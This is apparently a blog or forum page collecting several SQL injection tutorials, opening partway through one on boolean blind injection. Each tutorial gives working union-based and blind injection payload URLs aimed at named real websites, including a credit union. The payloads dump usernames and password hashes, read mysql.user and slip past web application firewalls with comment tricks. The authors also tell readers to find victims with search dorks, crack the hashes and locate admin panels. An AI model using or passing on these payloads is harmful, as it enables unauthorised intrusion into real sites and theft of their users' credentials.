http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+ ​limit+0,1),4,1))=115

Now we have our "News" table, but how do we know if there's more characters or not? We can check if the 5th letter's ascii value is > 0, and if it's not, it doesn't exist. So let's check.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+ ​limit+0,1),5,1))>0

And the page loads with an error.

Getting The Column Names

Getting the columns is fairly similar to getting the table names, you just add a where clause, and convert your table name to HEX/ASCII characters.

Let's see if our table even has columns first.

Code:
cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+ ​limit+0,1),1,1))>0

Page loads fine, so we have a first character that's value is more then 0. Now let's get the column name.

Code:
cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+ ​limit+0,1),1,1))>100

No errors, let's go up.

Code:
cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+ ​limit+0,1),1,1))>105

Error, it's between 100 and 105.

Code:
cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+ ​limit+0,1),1,1))=105

Loads fine, the value of 105 is "i".

Then we repeat the process, until we get our next character.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+ ​limit+0,1),2,1))>95

No error, let's try 100.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+ ​limit+0,1),2,1))>100

Error, let's see if it = 100.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+ ​limit+0,1),2,1))=100

No error, so now we have "id". Theres your first column, to get the next one, you'd just increase the limit and start over on your substring() statement.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+ ​limit+1,1),1,1))>0

Getting Data Out Of Columns

It's the same process, except we put our column names in a concat statement, FROM the TABLENAME.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(id)+from+News+limit+0,1),1,1))>0

So let's get our first character..

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(id)+from+News+limit+0,1),1,1))>45

No error, let's go up.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(id)+from+News+limit+0,1),1,1))>50

Error, go back down until you find the right one.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(id)+from+News+limit+0,1),1,1))=49

Loads fine, and the ascii value of 49 comes back to "1".

Now let's check if there's a second character..

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(id)+from+News+limit+0,1),2,1))>0

We get an error, so that was all that was our first result.

Conclusion

As you can see, "Blind Injection" doesn't really have to do with guessing, as long as your site has information_schema. The correct term is actually "Boolean Based Blind Injection", which makes sense. A Boolean returns a value of true/false, which is what we just went over.


Well guys, that's it. Hope you understand, let me know if you need anything.

-DownFall

[TUT] SQL Injection(Pics) [Highly Detailed] [10K+ Views]

Posted by 67 On 03:47

I won't go into detail on what SQLi is, you can google that for yourself.

Starting Off
First off, you need to find a vulnerable site. Easy ways to find vulnerable sites is to use google dorks, or you can use a list of sites.
Here's a list of both.
Google Dorks
Vulnerable Sites #1
Vulnerable Sites #2
Vulnerable Sites #3

Vulnerable Sites (With Syntax)
So after you got a vulnerable site, to test if you can inject, add a ' to the end of the url.
I'll be using this site
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=12

As you can see, it loads perfectly fine, with no error. Now to see if it's vulnerable, add a ' to the end, so it should look like this.
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=12'
Now you should get an error that looks like this.

Finding The Amount Of Columns
Now that you found a vulnerable site, you need to find the amount of columns.
You can do this by using the "Order By" function. We'll start by guessing at 5.
So take your url, and remove the ' from the end of it, and add +order+by+5--
Your link should now look like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=12+order+by+5--
As you can see, it loads perfectly fine, so you're going to want to increase it until you get an error that says "Unknown column '(Column Count Here)' in 'order clause'".
It looks like this:
So now that you got your error, you're going to want to decrease until you get a perfectly loaded page.
I got the error at
Code:
+order+by+14--
so I'm going to try
Code:
+order+by+13--

So my link looks like this now, and loads perfectly fine.
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=12+order+by+13--

Finding Vulnerable Columns
So now that you got the amount of columns, you're going to want to see which ones you can get data from.
You do this by using the "Union+Select" or "Union+All+Select" Function. First, you add a - in front of your ID Number.
It should look like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=-12
Or, instead, you can change the number to null, since that's what the - is doing.
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null
Then you want to use the Union Select function, so you add +union+select+(Column Count Here)--
So for each column, you add it.
My link now looks like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--

Now the site looks like this, so we know that 2,3, and 4 are vulnerable columns.

Getting MySQL Version
First off, we want it to be 5 or more. If it was less than 5, you would use error based injection (I won't cover that).
So pick one of your vulnerable columns, and replace it with either:
Code:
@@version
Or
Code:
version()
I'm gonna use column 2, so now my link looks like this..
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+Select+1,@@Version,3,4,5,6,7,8,9,10,11,12,13--
And my page looks like this..

Getting Table Names
Now that we got our version, we want to get our tables from the database.
Do this by using a few functions.
Code:
group_concat(table_name)
Code:
from+information_schema.tables
Code:
+where+table_schema=database()--

So pick a vulnerable column, and replace it with group_concat(table_name).
Then you want to add +from+information_schema.tables after your column count, and +where+table_schema=database()--
Your link should look something like this.
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+Select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12 ​,13+from+information_schema.tables+where+table_schema=database()--
And your site should now display the tables from the database.

As you can see, it looks all fucked up..in order to fix that, you can add 0x0a after table_name in your brackets, which means New Line.
So my link looks like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+Select+1,group_concat(table_name,0x0a),3,4,5,6,7,8,9,10, ​11,12,13+from+information_schema.tables+where+table_schema=database()--
And, the site doesn't look all fucked up anymore <3
Now as you see, we have a table called users, and that's what we want.

Getting Columns Out Of Tables
To do this, we use a few more functions similar to finding tables.
Code:
group_concat(column_name)
Code:
information_schema.columns
Code:
where+table_name="TABLE NAME HERE"

So now my link looks like this...
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+Select+1,group_concat(column_name,0x0a),3,4,5,6,7,8,9,10 ​,11,12,13+from+information_schema.columns+where+table_name="users"--
Unfortunately, we get an error. To bypass this, convert your table name into ASCII value.
The ASCII value of users looks something like this:
Code:
char(117,115,101,114,115)
To get the ASCII value, you can use this site HERE

So now my link looks like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+select+1,group_concat(column_name,0x0a),3,4,5,6,7,8,9,10 ​ ,11,12,13+from+information_schema.columns+where+table_name=char(117,115,101,114, ​115)--
And the site looks like this:
As you can see, we have some important columns there...now we want to get the data from them.

Getting Data From Columns
Ok, so I see ID, username, and password, and that's what I want.
Now, we just replace a few things.
Code:
group_concat(ID,0x3a,username,0x3a,password,0x0a)
Code:
from+Table Name Here
My link now looks like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+select+1,group_concat(ID,0x3a,username,0x3a,password,0x0 ​a),3,4,5,6,7,8,9,10,11,12,13+from+users--

So lets break that down a bit...
The 0x0a means New Line, as I said earlier, and 0x3a means colon.
So I added 0x3a after ID, and username, so it should look something like this.

ID:Username:Password

Instead of using +from+information_schema.tables or +from+information_schema.columns, we just want it from the users table.

So we do +from+users--

So, my finished link looks like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+select+1,group_concat(ID,0x3a,username,0x3a,password,0x0 ​a),3,4,5,6,7,8,9,10,11,12,13+from+users--

And finally, the site looks like this:

Getting Data From Multiple Databases

I'll be using this link as an example.
Code:
http://www.hubbardbrook.org/people/view.php?id=109'

Once you got your columns count, and vulnerable columns, you want to get the names of the databases.
You can do that by using:
Code:
group_concat(schema_name)
&
Code:
from information_schema.schemata

So my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16, ​17,18,19,20,21,22,23,24,25+from+information_schema.schemata--

Now I see that there are 2 different databases, one called "hbr" and one called "mysql". Now we want to see which one is the default, or current one. First write those down in notepad or something.

To find out, you pick your column, and use:
Code:
database()
So now my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(database()),5,6,7,8,9,10,11,12,13,14,15,16,1 ​7,18,19,20,21,22,23,24,25--

Now where column 4 was (my vulnerable column), we can see "hbr". So we know that's the current database. Now of course, you'd want to search through it to find your tables to see if you can find some login info. You would get the tables the normal way:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,1 ​ 7,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=data ​base()--

There's over 100 tables, but I didn't see anything that resembled user info, so now we check the other database. It's almost the same thing as finding the default tables. My other database name was called "mysql".
To get the tables of that, we convert it to hex, and use:
Code:
where+table_schema=0xdatabasehexhere
So the hex of "mysql" is 6d7973716c
Make sure you always add 0x in front of your hex.
Now my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,1 ​ 7,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=0x6d ​7973716c--

Now we got the tables from the second database, and we can see that theres a table named user!

Now we get the info from the users table, but make sure you keep the table_schema for that database. So now my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16, ​ 17,18,19,20,21,22,23,24,25+from+information_schema.columns+where+table_schema=0x ​6d7973716c+and+table_name=0x75736572--

0x75736572 is the hex of "user". So basically what I did was converted my table name to hex, and got the columns from the database.
Now we want the data from the columns. It's still almost the same, except for the very last bit.
There are 2 columns named "User" and "Password", which is what we want.
So make your group_concat function, but at the end, the syntax would be:
Code:
+from+databasename.tablename
So now my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(User,0x3a,Password,0x0a),5,6,7,8,9,10,11,12, ​13,14,15,16,17,18,19,20,21,22,23,24,25+from+mysql.user--

And as you can see, there are now logins where your column name was.

Conclusion
As you can see, theres a username called admin. Now you can say to yourself "Fuck yeah, I got your login".
Hold up, it's not that easy...almost everytime, the passwords are encrpyted one way or another, whether it's MD5, SHA1, Base64, and others....

You can attempt to crack them using a few sites, here's one that I use.
MD5Decrypter
HashChecker

Now you need to find the admin control panel, where you can login and do what the fuck you want...
Here's an online one that I use...
OutLaws Admin Finder
Admin Page Finder

HaviJ also has a password cracker and admin page finder.

String Based Injection

Is order by not working? Here's your solution.

Example:
Code:
www.site.com/dork.php?id=5+order+by+100--
You still get no errors, which is highly unlikely. Sometimes sites have a huge number, but it's usually not over 50.

To fix that, just add a ' after your id, and +- at the end of your syntax.
Example:
Code:
www.site.com/dork.php?id=5'+order+by+100--+-

Now you should get your error. Continue to use union select how I explained previously.

WAF Bypassing

WAF stands for web application firewall, which is web security that protects the site from being attacked.

Web application firewalls block out certain phrases.
Here are a few.

Code:
union
select
from
information_schema
concat
group_concat
where
and
@@version

How do you know if a firewall is installed?
Usually when you're trying to use the union select command, you'll get an error that says something like this.

Code:
Forbidden

You don't have permission to access /index.php on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

I'll use this site as an example.
Code:
http://www.timberwatch.org.za

After a bit, I found the site has 15 columns, so now I want to use union select to find the vulnerable ones.

When I tried it, I got my error.
Code:
http://www.timberwatch.org.za/index.php?id=-49+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--

To bypass these, comment out some of the phrases I listed earlier, by using comment tags.

Code:
/*!*/

Examples"
Code:
/*!union*/
/*!select*/
/*!from*/
/*!information_schema*/
/*!concat*/
/*!group_concat*/
/*!where*/
/*!and*/
version()

Blocked:
Code:
http://www.timberwatch.org.za/index.php?id=-49+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--

Bypassed:
Code:
http://www.timberwatch.org.za/index.php?id=-49+/*!union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--

Blocked:
Code:
http://www.timberwatch.org.za/index.php?id=-49+/*!union*/+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15--

Bypassed:
Code:
http://www.timberwatch.org.za/index.php?id=-49+/*!union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15--

Concat and the Limit Function

WAF has group_concat blocked? Use concat and limit to get around that.

Limit is to get around the limit of characters...lets say you want a list of all the tables. Sometimes it won't show them all because the amount of characters to be displayed has a limit. You use the limit function to get around that.

You change

Code:
group_concat(table_name)
to
Code:
concat(table_name)
Of course, adding this at the end.
Code:
limit 0,1--

So what that will do is show the first table, and the first table only.
To show the next table, change the 0 to 1.
Code:
limit 1,1--

Then you keep increasing until you find the table you want. If you get an error, it's because you already passed the last table.

Blind Injection (Advanced)

Blind injection is a lot harder then the other types, it requires skill and patience. To check for a vulnerability, you must go based off of true and false statements. If your statement is false, and anything is missing off the page (pictures, videos, words, content), then it's vulnerable.

Example:
Code:
www.site.com/dork.php?id=10+and+1=1

1 is equal to one, so that statement is true.

Code:
www.site.com/dork.php?id=10+and+1=2

1 doesn't equal 2, so this should return false. Now check and see if anything is missing.

Getting the Database Version

You have to guess the version, and use substring to check if it's true/false.

Code:
www.site.com/dork.php?id=10+and+substring(version(),1,1)=5

If that returns true (nothing missing from the page), then your version is 5. If not, your version is less. You can double check by doing the same thing, but replacing 5 with 4.

Code:
www.site.com/dork.php?id=10+and+substring(version(),1,1)=4

Getting the Table Names

You have to guess the table names, just like everything else.

Code:
www.site.com/dork.php?id=10+and+(select+1+from+admin)=1

If this returns true (nothing missing from the page, then the admin table exists.

Here are some common table names.
Code:
admin
admins
tbl_admin
tbladmin
member
members
tbl_members
tblmembers
user
users
tbl_users
tblusers
wp_users

Getting the Column Names

After you got your table name, you have to guess the columns.
Code:
www.site.com/dork.php?id=10+and+(select+substring(concat(1,admin_id,0x3a,admin_login,0x3a,adm​in_pass)+from+admin+limit+0,1)=1

If you get an error, one of the columns doesn't exist. So try one by one, and guess until you get the right one (nothing missing from the page).

Here are some common column names.

Code:
id
user_id
username
user
password
pass
passwd
pword
pwd
user_password
user_login
login

Getting Data From Your Columns

After you got your main information, you have to guess the characters ascii value, until you find the right one, then move on to the next one.

Code:
http://www.site.com/dork.php?id=10+and+ascii(substring((select concat(admin_id,0x3a,admin_login,0x3a,admin_pass)+from+admin+limit+0,1),1,1))>100

If nothing is missing from the page, your first letters ascii value is 100. If you get your error, then decrease until you get the right value.

To get the next character, you just add 1, just how I explained in the limit function.

Code:
http://www.site.com/dork.php?id=10+and+ascii(substring((select concat(admin_id,0x3a,admin_login,0x3a,admin_pass)+from+admin+limit+0,1),2,1))>100

You do that until you get all of your characters. You can tell it's the last character if the ascii value is less then 0.

Code:
http://www.site.com/dork.php?id=10+and+ascii(substring((select concat(admin_id,0x3a,admin_login,0x3a,admin_pass)+from+admin+limit+0,1),2,1))>0

Here's a site you can use to convert ascii to text.

ASCII Table

Well, hope you guys understood everything. PM me or post here if you have any questions, and I'll get back to you asap.

Credits
kobez - Dork List
DAN_UK - Hash cracking sites.

PM me for if you need help with anything.

SQL Injection Tutorial (MySQL)

Posted by 67 On 03:36

did not made this i found this ok so here it goes


In this tutorial i will describe how sql injection works and how to
use it to get some useful information.

First of all: What is SQL injection?
It’s one of the most common vulnerability in web applications today.
It allows attacker to execute database query in url and gain access
to some confidential information etc…(in shortly).

1.SQL Injection (classic or error based or whatever you call it)
2.Blind SQL Injection (the harder part)

So let’s start with some action

1). Check for vulnerability
Let’s say that we have some site like this
http://www.site.com/news.php?id=5
Now to test if is vulrnable we add to the end of url ‘ (quote),
and that would be http://www.site.com/news.php?id=5′
so if we get some error like
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”
or something similar
that means is vulrnable to sql injection

2). Find the number of columns
To find number of columns we use statement ORDER BY (tells database how to order the result)
so how to use it? Well just incrementing the number until we get an error.
http://www.site.com/news.php?id=5 order by 1/* <– no error
http://www.site.com/news.php?id=5 order by 2/* <– no error
http://www.site.com/news.php?id=5 order by 3/* <– no error
http://www.site.com/news.php?id=5 order by 4/* <– error (we get message like this Unknown column ‘4′ in ‘order clause’ or something like that)
that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function
With union we can select more data in one sql statement.
so we have
http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )
if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works

4). Check for MySQL version
http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try –
it’s a comment and it’s important for our query to work properly.
let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.
it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*
if you get an error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”
i didn’t see any paper covering this problem, so i must write it
what we need is convert() function
i.e.
http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
or with hex() and unhex()
i.e.
http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
and you will get MySQL version

5). Getting table and column name
well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12…) <— later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.
common table names are: user/s, admin/s, member/s …
common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc…
i.e would be
http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that’s good :D)
we know that table admin exists…
now to check column names.
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)
we get username displayed on screen, example would be admin, or superadmin etc…
now to check if column password exists
http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)
we seen password on the screen in hash or plain-text, it depends of how the database is set up
i.e md5 hash, mysql hash, sha1…
now we must complete query to look nice
for that we can use concat() function (it joins strings)
i.e
http://www.site.com/news.php?id=5 union all select 1,concat(username,0×3a,password),3 from admin/*
Note that i put 0×3a, its hex value for : (so 0×3a is hex value for colon)
(there is another way for that, char(58), ascii value for : )
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
now we get dislayed username:password on screen, i.e admin:admin or admin:somehash
when you have this, you can login like admin or some superuser
if can’t guess the right table name, you can always try mysql.user (default)
it has user i password columns, so example would be
http://www.site.com/news.php?id=5 union all select 1,concat(user,0×3a,password),3 from mysql.user/*

6). MySQL 5
Like i said before i’m gonna explain how to get table and column names
in MySQL > 5.
For this we need information_schema. It holds all tables and columns in database.
to get tables we use table_name and information_schema.tables.
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*
here we replace the our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
note that i put 0,1 (get 1 result starting from the 0th)
now to view the second table, we change limit 0,1 to limit 1,1
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
the second table is displayed.
for third table we put limit 2,1
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc…
To get the column names the method is the same.
here we use column_name and information_schema.columns
the method is same as above so example would be
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
the first column is diplayed.
the second one (we change limit 0,1 to limit 1,1)
ie.
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
the second column is displayed, so keep incrementing until you get something like
username,user,login, password, pass, passwd etc…
if you wanna display column names for specific table use this query. (where clause)
let’s say that we found table users.
i.e
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name=’users’/*
now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.
Note that this won’t work if the magic quotes is ON.
let’s say that we found colums user, pass and email.
now to complete query to put them all together
for that we use concat() , i decribe it earlier.
i.e
http://www.site.com/news.php?id=5 union all select 1,concat(user,0×3a,pass,0×3a,email) from users/*
what we get here is user:pass:email from table users.
example: admin:hash:whatever@blabla.com
That’s all in this part, now we can proceed on harder part

2. Blind SQL Injection
Blind injection is a little more complicated the classic injection but it can be done
I must mention, there is very good blind sql injection tutorial by xprog, so it’s not bad to read it
Let’s start with advanced stuff.
I will be using our example
http://www.site.com/news.php?id=5
when we execute this, we see some page and articles on that page, pictures etc…
then when we want to test it for blind sql injection attack
http://www.site.com/news.php?id=5 and 1=1 <— this is always true
and the page loads normally, that’s ok.
now the real test
http://www.site.com/news.php?id=5 and 1=2 <— this is false
so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.

1) Get the MySQL version
to get the version in blind attack we use substring
i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works
when select don’t work then we use subselect
i.e
http://www.site.com/news.php?id=5 and (select 1)=1
if page loads normally then subselects work.
then we gonna see if we have access to mysql.user
i.e
http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.

3). Check table and column names
This is part when guessing is the best friend
i.e.
http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)
then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one
let’s say that we have found that table name is users, now what we need is column name.
the same as table name, we start guessing. Like i said before try the common names for columns.
i.e
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
if the page loads normally we know that column name is password (if we get false then try common names or just guess)
here we merge 1 with the column password, then substring returns the first character (,1,1)

4). Pull data from database
we found table users i columns username password so we gonna pull characters from that.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>80
ok this here pulls the first character from first user in table users.
substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value
and then compare it with simbol greater then > .
so if the ascii char greater then 80, the page loads normally. (TRUE)
we keep trying until we get false.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>95
we get TRUE, keep incrementing
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>98
TRUE again, higher
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>99
FALSE!!!
so the first character in username is char(99). Using the ascii converter we know that char(99) is letter ‘c’.
then let’s check the second character.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),2,1))>99
Note that i’m changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>99
TRUE, the page loads normally, higher.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>107
FALSE, lower number.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>104
TRUE, higher.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>105
FALSE!!!
we know that the second character is char(105) and that is ‘i’. We have ‘ci’ so far
so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

There are some tools for Blind SQL Injection, i think sqlmap is the best, but i’m doing everything manually,
cause that makes you better SQL INJECTOR
Hope you learned something from this paper.
Have FUN! (: